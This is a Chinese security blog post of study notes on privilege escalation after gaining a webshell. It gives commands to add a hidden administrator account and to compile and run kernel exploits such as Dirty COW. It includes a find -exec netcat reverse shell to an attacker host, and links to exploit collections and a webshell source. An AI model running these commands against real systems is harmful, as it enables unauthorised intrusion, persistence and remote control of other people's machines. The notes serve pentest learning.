<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8" />
    
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    提权与后门维持 |  w&#39; Blog
  </title>
  <meta name="generator" content="hexo-theme-yilia-plus">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/css/main.css">

  
  <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
  
  

  

<link rel="alternate" href="/atom.xml" title="w' Blog" type="application/atom+xml">
</head>

</html>

<body>
  <div id="app">
    <main class="content">
      <section class="outer">
  <article id="post-提权与后门维持" class="article article-type-post" itemscope
  itemprop="blogPost" data-scroll-reveal>

  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  提权与后门维持
</h1>
  

    </header>
    

    
    <div class="article-meta">
      <a href="/2020/03/23/%E6%8F%90%E6%9D%83%E4%B8%8E%E5%90%8E%E9%97%A8%E7%BB%B4%E6%8C%81/" class="article-date">
  <time datetime="2020-03-23T11:02:56.000Z" itemprop="datePublished">2020-03-23</time>
</a>
      
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
  </div>

      
      
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">1.3k字</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">5分钟</span>
        </span>
    </span>
</div>

      
    </div>
    

    
    
    <div class="tocbot"></div>





    

    
    <div class="article-entry" itemprop="articleBody">
      


      

      
      <h1 id="提权与后门维持"><a href="#提权与后门维持" class="headerlink" title="提权与后门维持"></a>提权与后门维持</h1><ul>
<li>拿下网站!=拿下网站服务器；<br>  拿下网站=获得webshell，拿下网站服务器=拿下root（system）权限<br>  拿下网站服务器也不一定拿下网站，可能站库分离，有单独的数据库服务器</li>
<li>网站webshell权限解析：<br>  一般情况下，webshell权限介于guests-users之间，权限较小<br>  非一般情况下，由以下两点决定：<ol>
<li>脚本类型<br><strong>asp、php（小于users，匿名权限）&lt; aspx（users）&lt; jsp(system)</strong></li>
<li>搭建工具<br><strong>phpstudy，lamp,apmserv第三方软件等</strong></li>
</ol>
</li>
<li>POC、EXP<ul>
<li>POC：概念验证；常指一段漏洞验证的代码，证明漏洞是否存在，无害。</li>
<li>EXP：利用；指利用系统漏洞进行攻击的代码，有害。</li>
<li>有了POC才有EXP；每个漏洞都由自己的EXP，不存在通用的EXP。</li>
</ul>
</li>
</ul>
<h2 id="一-前期工作-信息收集"><a href="#一-前期工作-信息收集" class="headerlink" title="一.前期工作-信息收集"></a>一.前期工作-信息收集</h2><ul>
<li>内外网</li>
<li>服务系统和版本位数</li>
<li>服务器的补丁情况</li>
<li>服务器的安装软件情况</li>
<li>服务器的防护软件情况</li>
<li>端口情况</li>
<li>所支持的脚本情况</li>
</ul>
<p><em>详细命令参考内网渗透笔记</em></p>
<h2 id="二-提权"><a href="#二-提权" class="headerlink" title="二.提权"></a>二.提权</h2><p><em>前提：已获取低权shell</em></p>
<h3 id="msf提权"><a href="#msf提权" class="headerlink" title="msf提权"></a>msf提权</h3><ul>
<li>参考msf后渗透一文中的提权模块</li>
</ul>
<h3 id="系统漏洞提权"><a href="#系统漏洞提权" class="headerlink" title="系统漏洞提权"></a>系统漏洞提权</h3><h4 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h4><ul>
<li>提权EXP一般格式为 MS08067.exe或 .com（cmd下执行）</li>
<li>EXP选择：使用systeminfo命令或者查看补丁目录，查看补丁记录，来判断有哪个补丁没打，然后使用相对应的exp进行提权。（可使用辅助工具脚本）</li>
<li>前提：已获取到shell</li>
</ul>
<h5 id="cmd可执行"><a href="#cmd可执行" class="headerlink" title="cmd可执行"></a>cmd可执行</h5><h6 id="使用特定exp"><a href="#使用特定exp" class="headerlink" title="使用特定exp"></a>使用特定exp</h6><ol>
<li>通过systeminfo获取补丁安装情况获取可用提权exp</li>
<li>在可读可写的目录（不要含空格，一般是回收站）上传提权exp</li>
<li>使用exp提权<ul>
<li><code>exp.exe &quot;whoami&quot;</code>查看提权结果是否成功</li>
<li><code>exp.exe &quot;net user hack hack123 /add&quot;</code>添加用户</li>
<li><code>exp.exe &quot;net localgroup administrators hack /add</code>添加用户到管理员组</li>
<li>使用rdp远程登录到目标主机<ul>
<li>如果没有开放rdp服务，使用.exe .bat .vbs等脚本开启</li>
</ul>
</li>
</ul>
</li>
</ol>
<h6 id="使用pr提权"><a href="#使用pr提权" class="headerlink" title="使用pr提权"></a>使用pr提权</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">Microsoft Windows RPCSS服务隔离本地权限提升漏洞</span><br><span class="line"></span><br><span class="line">RPCSS服务没有正确地隔离 NetworkService 或 LocalService 帐号下运行的进程，本地攻击者可以利用令牌劫持的方式获得权限提升。成功利用此漏洞的攻击者可以完全控制受影响的系统，攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。</span><br><span class="line">BUGTRAQ ID: 34443</span><br><span class="line">CVE(CAN) ID: CVE-2009-0079</span><br><span class="line"></span><br><span class="line">发布日期：2009-04-14</span><br><span class="line">更新日期：2009-04-24</span><br><span class="line"></span><br><span class="line">受影响系统：</span><br><span class="line">Microsoft Windows XP x64 SP2</span><br><span class="line">Microsoft Windows XP x64</span><br><span class="line">Microsoft Windows XP SP3</span><br><span class="line">Microsoft Windows XP SP2</span><br><span class="line">Microsoft Windows Server 2003 SP2</span><br><span class="line">Microsoft Windows Server 2003 SP1</span><br></pre></td></tr></table></figure>
<p>步骤与特定exp提权类似</p>
<h5 id="cmd命令无法执行"><a href="#cmd命令无法执行" class="headerlink" title="cmd命令无法执行"></a>cmd命令无法执行</h5><ul>
<li>原因：<ul>
<li>组件被禁用或删除（wscript.shell）</li>
<li>cmd被降权或删除</li>
<li>防护软件拦截</li>
</ul>
</li>
<li>解决<ul>
<li>被拦截和降权：找可读可写目录，上传cmd.exe,调用上传的cmd.exe，执行cmd.exe命令（使用绝对目录）</li>
<li>组件被删除：检查是否支持aspx，如果支持aspx，可以通过aspx大马直接调用系统的cmd，<a href="http://www.mumaasp.com/" target="_blank" rel="noopener">asp大马脚本下载</a></li>
</ul>
</li>
</ul>
<h4 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h4><ul>
<li>提权exp一般按照内核版本来命名，格式为2.6.18-194或2.6.18.c（需要gcc编译后使用）</li>
</ul>
<h5 id="内核漏洞提权"><a href="#内核漏洞提权" class="headerlink" title="内核漏洞提权"></a>内核漏洞提权</h5><ul>
<li>信息收集得到Linux版本<code>cat /etc/issus</code> <code>uname -a</code></li>
<li>寻找对应版本漏洞的exp<ul>
<li>漏洞库手动查找：<a href="https://github.com/SecWiki/linux-kernel-exploits" target="_blank" rel="noopener">Linux</a></li>
<li>kali里使用<code>searchsploit</code>搜索对应内核漏洞：<code>searchsploit linux 版本号</code> <code>searchsploit Ubuntu（发行版） 16 kernel 内核版本号</code></li>
<li>将exp上传到目标机或者使用wget，scp（ssh已开启）命令</li>
<li>编译exp<code>gcc exp(.c) -o exp可执行文件名</code></li>
<li>执行<code>./exp可执行文件名</code></li>
</ul>
</li>
</ul>
<h5 id="脏牛提权"><a href="#脏牛提权" class="headerlink" title="脏牛提权"></a>脏牛提权</h5><ul>
<li>exp下载地址：<a href="https://github.com/FireFart/dirtycow" target="_blank" rel="noopener">dirty.c</a></li>
<li>将exp上传到目标机，或者目标机使用wget下载exp</li>
<li>编译exp文件<code>gcc -pthread dirty.c -o dirty -lcrypt</code></li>
<li>执行exp<code>./dirty my-new-password</code></li>
</ul>
<h4 id="自动探测漏洞"><a href="#自动探测漏洞" class="headerlink" title="自动探测漏洞"></a>自动探测漏洞</h4><ul>
<li><p><a href="https://github.com/AonCyberLabs/Windows-Exploit-Suggester" target="_blank" rel="noopener">windos脚本地址</a></p>
<ul>
<li>使用方法：<ul>
<li>更新数据库，生成漏洞对应编号的表格。<br><code>python2 windows-exploit-suggester.py --update</code></li>
<li>安装必要的依赖xlrd<br><code>pip install xlrd --upgrade</code></li>
<li>将 xx.txt 作为参数传给脚本<br><code>python windows-exploit-suggester.py --database 2020-xx.xls --systeminfo xx.txt</code><br>2020-xx.xls为生成的漏洞对应编号的表格；xx.txt为在靶机上执行systeminfo后的信息并保存在txt文档中</li>
</ul>
</li>
</ul>
</li>
<li><p><a href="https://github.com/jondonas/linux-Exploit-Suggester-2" target="_blank" rel="noopener">linux脚本地址</a></p>
</li>
<li><p><code>post/multi/recon/local_exploit_suggester</code> msf后渗透自动探测模块</p>
</li>
</ul>
<hr>
<h4 id="提权辅助资料"><a href="#提权辅助资料" class="headerlink" title="提权辅助资料"></a>提权辅助资料</h4><ul>
<li><a href="https://github.com/SecWiki/windows-kernel-exploits" target="_blank" rel="noopener">Windows系统溢出漏洞exp提权汇总</a></li>
<li><a href="https://github.com/SecWiki/linux-kernel-exploits" target="_blank" rel="noopener">linux系统溢出漏洞exp提权汇总</a></li>
<li><a href="https://github.com/vulmon/Vulmap/" target="_blank" rel="noopener">本地联网漏扫vulmap</a></li>
<li><a href="http://bugs.hacking8.com/tiquan/" target="_blank" rel="noopener">提权辅助网页</a></li>
<li><a href="https://detect.secwx.com/" target="_blank" rel="noopener">在线提权漏洞检测平台</a></li>
<li><a href="https://github.com/AlessandroZ/BeRoot" target="_blank" rel="noopener">BeRoot</a></li>
</ul>
<h3 id="中间件提权"><a href="#中间件提权" class="headerlink" title="中间件提权"></a>中间件提权</h3><ul>
<li>iis6.0<ul>
<li>通过漏洞cve-2017-7269获取shell</li>
<li>使用exp：iis62.exe提权</li>
</ul>
</li>
</ul>
<h3 id="Linux-SUID提权"><a href="#Linux-SUID提权" class="headerlink" title="Linux SUID提权"></a>Linux SUID提权</h3><ul>
<li>SUID：在可执行文件的执行位上，具有SUID权限执行的时候具有所有者的身份</li>
<li>寻找root用户具有SUID权限的文件:<code>find / -user root -perm -4000 -print 2&gt;/dev/null</code><ul>
<li>nmap提权(2.02-5.21)<ul>
<li>启动交互模式:<code>nmap --interactive</code></li>
<li><code>!sh</code>，进入</li>
</ul>
</li>
<li>find提权<ul>
<li>创建一个文件<code>touch test</code></li>
<li>攻击机nc监听<code>nc -nlvp 1234</code></li>
<li>目标机上执行<code>find test -exec netcat 攻击机ip 1234 -e /bin/bash \;</code>获得反弹shell</li>
</ul>
</li>
<li>查找到的可执行文件使用搜索引擎逐一搜索是否存在提权漏洞</li>
</ul>
</li>
</ul>

      
      <!-- reward -->
      
      <div id="reward-btn">
        打赏
      </div>
      
    </div>
    
    
      <!-- copyright -->
      
        <div class="declare">
          <ul class="post-copyright">
            <li>
              <i class="ri-copyright-line"></i>
              <strong>版权声明： </strong s>
              本博客所有文章除特别声明外，均采用 <a href="https://www.apache.org/licenses/LICENSE-2.0.html" rel="external nofollow"
                target="_blank">Apache License 2.0</a> 许可协议。转载请注明出处！
            </li>
          </ul>
        </div>
        
    <footer class="article-footer">
      
          
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://yoursite.com/2020/03/23/%E6%8F%90%E6%9D%83%E4%B8%8E%E5%90%8E%E9%97%A8%E7%BB%B4%E6%8C%81/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="tag">学习笔记</a></li></ul>


    </footer>

  </div>

  
  
  <nav class="article-nav">
    
      <a href="/2020/03/23/%E5%8F%8D%E5%BC%B9shell/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            反弹shell
          
        </div>
      </a>
    
    
      <a href="/2020/03/22/msf%E5%90%8E%E6%B8%97%E9%80%8F/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">msf后渗透</div>
      </a>
    
  </nav>


  

  
  
<!-- valine评论 -->
<div id="vcomments-box">
    <div id="vcomments">
    </div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#vcomments',
        app_id: '',
        app_key: '',
        path: window.location.pathname,
        notify: 'false',
        verify: 'false',
        avatar: 'mp',
        placeholder: '给我的文章加点评论吧~',
        recordIP: true
    });
    const infoEle = document.querySelector('#vcomments .info');
    if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
        infoEle.childNodes.forEach(function (item) {
            item.parentNode.removeChild(item);
        });
    }
</script>
<style>
    #vcomments-box {
        padding: 5px 30px;
    }

    @media screen and (max-width: 800px) {
        #vcomments-box {
            padding: 5px 0px;
        }
    }

    #vcomments-box #vcomments {
        background-color: #fff;
    }

    .v .vlist .vcard .vh {
        padding-right: 20px;
    }

    .v .vlist .vcard {
        padding-left: 10px;
    }
</style>

  

  
  
  

</article>
</section>
      <footer class="footer">
  <div class="outer">
    <ul class="list-inline">
      <li>
        &copy;
        2020
        w
      </li>
      <li>
        
        Powered by
        
        
        <a href="https://hexo.io" target="_blank">Hexo</a> Theme <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul class="list-inline">
      <li>
        
        
        <span>
  <i>PV:<span id="busuanzi_value_page_pv"></span></i>
  <i>UV:<span id="busuanzi_value_site_uv"></span></i>
</span>
        
      </li>
      
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="to_top">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>
      </div>
    </main>
    <aside class="sidebar">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/logo.png" alt="w&#39; Blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>在?请我喝杯咖啡?</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay1.png">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat2.png">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/share.js"></script>


<script src="/js/lazyload.min.js"></script>


<script>
  try {
    var typed = new Typed("#subtitle", {
      strings: ['面朝大海,春暖花开', '春赏百花冬观雪', '今晚的月色真美'],
      startDelay: 0,
      typeSpeed: 200,
      loop: true,
      backSpeed: 100,
      showCursor: true
    });
  } catch (err) {
  }

</script>




<script src="/js/tocbot.min.js"></script>

<script>
  // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto',
    onClick: (e) => {
      $('.toc-link').removeClass('is-active-link');
      $(`a[href=${e.target.hash}]`).addClass('is-active-link');
      $(e.target.hash).scrollIntoView();
      return false;
    }
  });
</script>



<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/js/ayer.js"></script>



<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>




<script src="/js/busuanzi-2.3.pure.min.js"></script>



<script type="text/javascript" src="https://js.users.51.la/20544303.js"></script>


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.2/dist/jquery.fancybox.min.css">
<script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.2/dist/jquery.fancybox.min.js"></script>


    
    <div id="music">
    
    
    
    <iframe frameborder="no" border="1" marginwidth="0" marginheight="0" width="200" height="52"
        src="//music.163.com/outchain/player?type=2&id=448738638&auto=1&height=32"></iframe>
</div>

<style>
    #music {
        position: fixed;
        right: 15px;
        bottom: 0;
        z-index: 998;
    }
</style>
    
  </div>
</body>

</html>